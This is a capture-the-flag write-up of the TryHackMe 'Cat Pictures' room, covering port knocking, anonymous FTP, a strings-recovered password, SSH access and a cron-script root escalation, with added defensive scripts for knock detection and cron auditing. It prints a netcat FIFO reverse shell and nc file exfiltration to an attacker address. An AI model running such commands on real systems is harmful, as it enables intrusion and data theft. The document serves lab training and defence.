THM: Cat Pictures
I made a forum where you can post cute cat pictures!
Easy rated. This is Cat Pictures from THM. Ratings are weird; I did Linux Server Forensics the other day which is Medium rated; I’m not going to bother writing it up because it was so straightforward. Anyway. This one sounds like it might be a file upload vulnerability or something? Turns out it’s not …
Ports
The description sounds like a web challenge; what do we get?
SSH, an unknown service on port 4420, and an HTTP proxy on 8080. Guess that last one is our target, but first let’s check 4420.
4420
┌──(root💀kali)-[/opt/thm/catpictures]
└─# nc 10.10.137.126 4420
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
asd
Invalid password...
Connection Closed
I guess we can always bruteforce it if we have to.
8080
The homepage for the website is a bulletin board, and there is a link to one forum topic. If we go there, we get this in the post:
Post cat pictures here!
Post by user » Wed Mar 24, 2021 8:33 pm
POST ALL YOUR CAT PICTURES HERE
Knock knock! Magic numbers: 1111, 2222, 3333, 4444
Well, we should knock then:
┌──(root💀kali)-[/opt/thm/catpictures]
└─# knock 10.10.137.126 1111 2222 3333 4444
┌──(root💀kali)-[/opt/thm/catpictures]
└─# rustscan -a 10.10.137.126 --ulimit 5000 -b 2000
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.137.126:22
Open 10.10.137.126:21
Open 10.10.137.126:4420
Open 10.10.137.126:8080
It seems we now have FTP.
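Port knocking only hides the FTP service; anyone who learns the sequence (here, posted on the public forum) gets the same result, so it is not authentication. It also leaves a trace: each knock is a SYN to a closed port that a host firewall logs. The following is an added example (my own code, not part of this write-up or of the THM room) that reads constructed UFW-style block log lines and reports which source addresses completed the 1111, 2222, 3333, 4444 sequence in order within a short window. The log lines, addresses and year are placeholders, and the log format is assumed to be UFW's kernel-log style.

```python
import re
from datetime import datetime

# Constructed sample lines in the style of Ubuntu's UFW block log; the hosts
# and addresses are placeholders, not the machine in the write-up.
SAMPLE_LOG = """\
Jun  4 14:39:58 host kernel: [UFW BLOCK] IN=eth0 OUT= SRC=192.0.2.10 DST=198.51.100.5 PROTO=TCP SPT=40001 DPT=1111 SYN
Jun  4 14:39:58 host kernel: [UFW BLOCK] IN=eth0 OUT= SRC=192.0.2.10 DST=198.51.100.5 PROTO=TCP SPT=40002 DPT=2222 SYN
Jun  4 14:39:59 host kernel: [UFW BLOCK] IN=eth0 OUT= SRC=192.0.2.10 DST=198.51.100.5 PROTO=TCP SPT=40003 DPT=3333 SYN
Jun  4 14:39:59 host kernel: [UFW BLOCK] IN=eth0 OUT= SRC=192.0.2.10 DST=198.51.100.5 PROTO=TCP SPT=40004 DPT=4444 SYN
Jun  4 14:40:30 host kernel: [UFW BLOCK] IN=eth0 OUT= SRC=192.0.2.77 DST=198.51.100.5 PROTO=TCP SPT=51000 DPT=1111 SYN
Jun  4 14:40:31 host kernel: [UFW BLOCK] IN=eth0 OUT= SRC=192.0.2.77 DST=198.51.100.5 PROTO=TCP SPT=51001 DPT=3333 SYN
Jun  4 14:40:32 host kernel: [UFW BLOCK] IN=eth0 OUT= SRC=192.0.2.77 DST=198.51.100.5 PROTO=TCP SPT=51002 DPT=2222 SYN
Jun  4 14:40:33 host kernel: [UFW BLOCK] IN=eth0 OUT= SRC=192.0.2.77 DST=198.51.100.5 PROTO=TCP SPT=51003 DPT=4444 SYN
"""

# The knock sequence from the forum post.
KNOCK_SEQUENCE = [1111, 2222, 3333, 4444]

LINE_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) .*SRC=(?P<src>\S+) .*DPT=(?P<dpt>\d+)")


def parse_blocks(text, year=2021):
    """Return (timestamp, source address, destination port) for each blocked packet line.
    Syslog timestamps carry no year, so one is assumed."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["src"], int(m["dpt"])))
    return events


def find_knockers(events, sequence, window_seconds=10):
    """Return the set of sources that hit `sequence` in order, with each step
    arriving within `window_seconds` of the previous one. A wrong port resets
    the sequence (unless it is the first port, which starts a new attempt)."""
    progress = {}  # src -> (index of next expected port, time of last matching hit)
    knockers = set()
    for ts, src, dpt in sorted(events):
        idx, last = progress.get(src, (0, None))
        if last is not None and (ts - last).total_seconds() > window_seconds:
            idx, last = 0, None  # attempt timed out; start over
        if dpt == sequence[idx]:
            idx, last = idx + 1, ts
            if idx == len(sequence):
                knockers.add(src)
                idx, last = 0, None
        elif dpt == sequence[0]:
            idx, last = 1, ts
        else:
            idx, last = 0, None
        progress[src] = (idx, last)
    return knockers


if __name__ == "__main__":
    print(find_knockers(parse_blocks(SAMPLE_LOG), KNOCK_SEQUENCE))
```

In the sample, 192.0.2.10 completes the sequence and 192.0.2.77 hits the same four ports out of order, so only the first is reported. On a real host the same logic belongs in whatever consumes the firewall log, and a knock followed by a new connection to port 21 is the event worth alerting on.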
FTP
The FTP server allows anonymous login, but we cannot PUT. There is a single file we can download, and it contains a password. With that, it’s back to port 4420.
4420, again
┌──(root💀kali)-[/opt/thm/catpictures]
└─# nc 10.10.137.126 4420
INTERNAL SHELL SERVICE
please note: cd commands do not work at the moment, the developers are fixing it at the moment.
do not use ctrl-c
Please enter password:
sardinethecat
Password accepted
We have a limited shell. Enumerating finds a (binary) file called runme, but it won’t run in the limited shell. I get a reverse shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.10.123 1234 >/tmp/f
and I can run the binary; it wants a password. However, the password is not the one we already have. I exfil the file with nc:
┌──(root💀kali)-[/opt/thm/catpictures]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.9.10.123] from (UNKNOWN) [10.10.137.126] 49106
/bin/sh: 0: can't access tty; job control turned off
# cd /home/catlover
# nc 10.9.10.123 1235 < runme
And a listener:
┌──(root💀kali)-[/opt/thm/catpictures]
└─# nc -l -p 1235 > runme
Once I get the file, strings is all that’s required:
┌──(root💀kali)-[/opt/thm/catpictures]
└─# strings runme
/lib64/ld-linux-x86-64.so.2
__gmon_start__
# etc
rebecca
Please enter yout password:
Welcome, catlover! SSH key transfer queued!
touch /tmp/gibmethesshkey
Access Denied
# more etc
So let’s do that:
# ./runme
Please enter yout password: rebecca
Welcome, catlover! SSH key transfer queued!
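The reason strings is enough here is that the binary compares the typed password against a literal that the compiler stored in cleartext in its read-only data, right next to the prompt text; anyone who can copy the file can read it. As an added example (my own code, not the write-up's runme or anything from THM), the block below does what strings does by default, pulling runs of printable ASCII out of a constructed stand-in for such a binary, and then applies the heuristic used above: a whitespace-free string sitting next to a prompt that mentions "password" is the likely comparison value. The byte blob and the PLACEHOLDER_SECRET value are constructed for the example.

```python
import re

# Constructed stand-in for a compiled binary, not the write-up's runme: an
# ELF-like header, non-text filler, a few opcode-like bytes, then the
# NUL-terminated C strings a compiler places in .rodata. The secret is a
# placeholder value.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + bytes(range(128, 256))
    + b"\x55\x48\x89\xe5\x48\x83\xec\x10"      # push rbp; mov rbp,rsp; sub rsp,16
    + b"PLACEHOLDER_SECRET\x00"
    + b"Please enter your password:\x00"
    + b"Access Denied\x00"
    + b"\xc9\xc3"                              # leave; ret
)


def extract_strings(data, min_len=4):
    """Return (offset, text) for each run of at least min_len printable ASCII
    bytes, which is what `strings` reports by default."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pattern.finditer(data)]


def candidate_secrets(strings, keyword="password"):
    """Heuristic: a string with no whitespace that sits immediately before or
    after a prompt mentioning `keyword` is likely the value the prompt input is
    compared against. Prompts themselves are excluded."""
    texts = [text for _, text in strings]
    found = []
    for i, text in enumerate(texts):
        if keyword not in text.lower():
            continue
        for j in (i - 1, i + 1):
            if 0 <= j < len(texts):
                neighbour = texts[j]
                if " " not in neighbour and keyword not in neighbour.lower():
                    found.append(neighbour)
    return found


if __name__ == "__main__":
    found = extract_strings(SAMPLE_BINARY)
    for offset, text in found:
        print(f"{offset:#08x}  {text}")
    print("candidate secrets:", candidate_secrets(found))
```

The fix on the build side is not to obfuscate the literal but to keep the secret out of the binary altogether: read a salted hash from a root-only file at run time and compare against that, so a copy of the executable gives an attacker nothing to compare with.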
SSH
The key is written to /home/catlover/id_rsa and once we have it we can SSH in:
┌──(root💀kali)-[/opt/thm/catpictures]
└─# nano id_rsa
┌──(root💀kali)-[/opt/thm/catpictures]
└─# chmod 600 id_rsa
┌──(root💀kali)-[/opt/thm/catpictures]
└─# ssh -i id_rsa catlover@10.10.137.126
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-142-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information disabled due to load higher than 1.0
52 updates can be applied immediately.
25 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Last login: Fri Jun 4 14:40:35 2021
root@7546fa2336d6:/#
And at this point we are root in a Docker container and we can get Flag 1.
Root, but actually
The root part isn’t a traditional Docker container escape. A cron job on the host runs a script as root, and that script lives in a directory we can see from inside the container:
root@7546fa2336d6:/opt/clean# ls -lash
total 16K
4.0K drwxr-xr-x 2 root root 4.0K May 1 00:20 .
8.0K drwxrwxr-x 1 root root 4.0K Mar 25 16:08 ..
4.0K -rw-r--r-- 1 root root 27 May 1 00:20 clean.sh
We can edit it, so I just add a bash reverse shell line and wait a minute:
┌──(root💀kali)-[/opt/thm/catpictures]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.9.10.123] from (UNKNOWN) [10.10.180.254] 46094
bash: cannot set terminal process group (4964): Inappropriate ioctl for device
bash: no job control in this shell
root@cat-pictures:~# cd /root
cd /root
root@cat-pictures:~# ls -lash
ls -lash
total 60K
4.0K drwx------ 8 root root 4.0K Apr 2 17:37 .
4.0K drwxr-xr-x 23 root root 4.0K Apr 30 19:57 ..
0 lrwxrwxrwx 1 root root 9 Mar 24 13:14 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
4.0K drwx------ 3 root root 4.0K Mar 31 19:44 .cache
4.0K drwx------ 3 root root 4.0K Mar 24 11:40 .config
4.0K drwxr-xr-x 2 root root 4.0K Apr 2 17:37 firewall
4.0K drwx------ 3 root root 4.0K Mar 24 11:34 .gnupg
4.0K -rw------- 1 root root 28 Apr 2 15:57 .lesshst
4.0K drwxr-xr-x 3 root root 4.0K Mar 24 11:23 .local
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rw------- 1 root root 45 Mar 31 19:49 .python_history
4.0K -rw-r--r-- 1 root root 73 Mar 25 09:29 root.txt
4.0K -rw-r--r-- 1 root root 66 Mar 25 09:14 .selected_editor
4.0K drwx------ 2 root root 4.0K Mar 25 12:31 .ssh
4.0K -rw-r--r-- 1 root root 168 Apr 2 14:06 .wget-hsts
root@cat-pictures:~# cat root.txt
cat root.txt
Congrats!!!
Here is your flag:
GO_GET_IT_YOURSELF
root@cat-pictures:~#
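The lesson from the root step is that a cron job is only as trustworthy as the people who can change the script it runs. Here the script was root-owned and 0644, but it sat in a directory that was also reachable from a container where we already had root, which is the same mistake as a world-writable cron script seen from the host's side. As an added example (my own code, not from the write-up or from THM), the block below parses a crontab in the shape of `crontab -l` output, follows each entry to the script it executes, and flags scripts that someone other than the owning user could edit or replace. It builds two placeholder scripts in a temporary directory so it runs offline; the crontab text, paths and modes are constructed for the example. It does not detect a directory exported into a container, which needs the container runtime's view of its mounts and is a separate check.

```python
import os
import stat
import tempfile

# Constructed crontab text in the shape of root's `crontab -l` output (five
# schedule fields, then the command). The {base} paths are placeholders that
# demo() creates under a temporary directory.
SAMPLE_CRONTAB = """\
# m h  dom mon dow   command
* * * * * /bin/bash {base}/clean/clean.sh
0 3 * * * {base}/safe/rotate.sh
"""

# Commands whose first argument is the script that actually runs.
INTERPRETERS = {"sh", "bash", "python3", "/bin/sh", "/bin/bash", "/usr/bin/python3"}


def script_paths(crontab_text):
    """Return the script path each active crontab entry executes."""
    paths = []
    for line in crontab_text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or len(fields) < 6:
            continue
        command = fields[5:]
        if command[0] in INTERPRETERS and len(command) > 1:
            paths.append(command[1])
        else:
            paths.append(command[0])
    return paths


def audit_script(path, trusted_uid):
    """List the ways someone other than trusted_uid could change what this
    cron entry ends up running: foreign ownership, a writable script, or a
    writable (non-sticky) parent directory that lets the file be swapped."""
    findings = []
    st = os.stat(path)
    if st.st_uid != trusted_uid:
        findings.append("not owned by the trusted user")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("group- or world-writable")
    parent = os.stat(os.path.dirname(path))
    if parent.st_mode & (stat.S_IWGRP | stat.S_IWOTH) and not parent.st_mode & stat.S_ISVTX:
        findings.append("parent directory writable by others (script can be replaced)")
    return findings


def audit_crontab(crontab_text, trusted_uid):
    """Map each referenced script to its findings; an empty list means clean."""
    return {p: audit_script(p, trusted_uid) for p in script_paths(crontab_text)}


def demo():
    """Create one weak and one sound placeholder script, audit them, and
    return the findings keyed by path relative to the temp directory."""
    base = tempfile.mkdtemp()
    weak = os.path.join(base, "clean", "clean.sh")
    sound = os.path.join(base, "safe", "rotate.sh")
    for p in (weak, sound):
        os.makedirs(os.path.dirname(p))
        with open(p, "w") as f:
            f.write("#!/bin/sh\nrm -f /tmp/*.tmp\n")  # placeholder script body
    os.chmod(weak, 0o666)                   # anyone can edit the script body
    os.chmod(os.path.dirname(weak), 0o777)  # and the directory, so the file can be swapped
    os.chmod(sound, 0o755)
    os.chmod(os.path.dirname(sound), 0o755)
    # The trusted uid is the current user here; on a real host it would be 0.
    report = audit_crontab(SAMPLE_CRONTAB.format(base=base), os.getuid())
    return {os.path.relpath(p, base): f for p, f in report.items()}


if __name__ == "__main__":
    for script, findings in demo().items():
        print(script, "->", findings or ["ok"])
```

Run against a real host, pass 0 as the trusted uid and feed it the output of `crontab -l` as root; /etc/crontab and /etc/cron.d entries carry an extra user field, so the field offset would need adjusting for those.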
This was pretty pure CTF but I still enjoyed it. THM haven’t had much interesting content lately so this was okay. I’ve been working on their Autopsy room which is also kind of interesting so I’ll have something to say about that soon.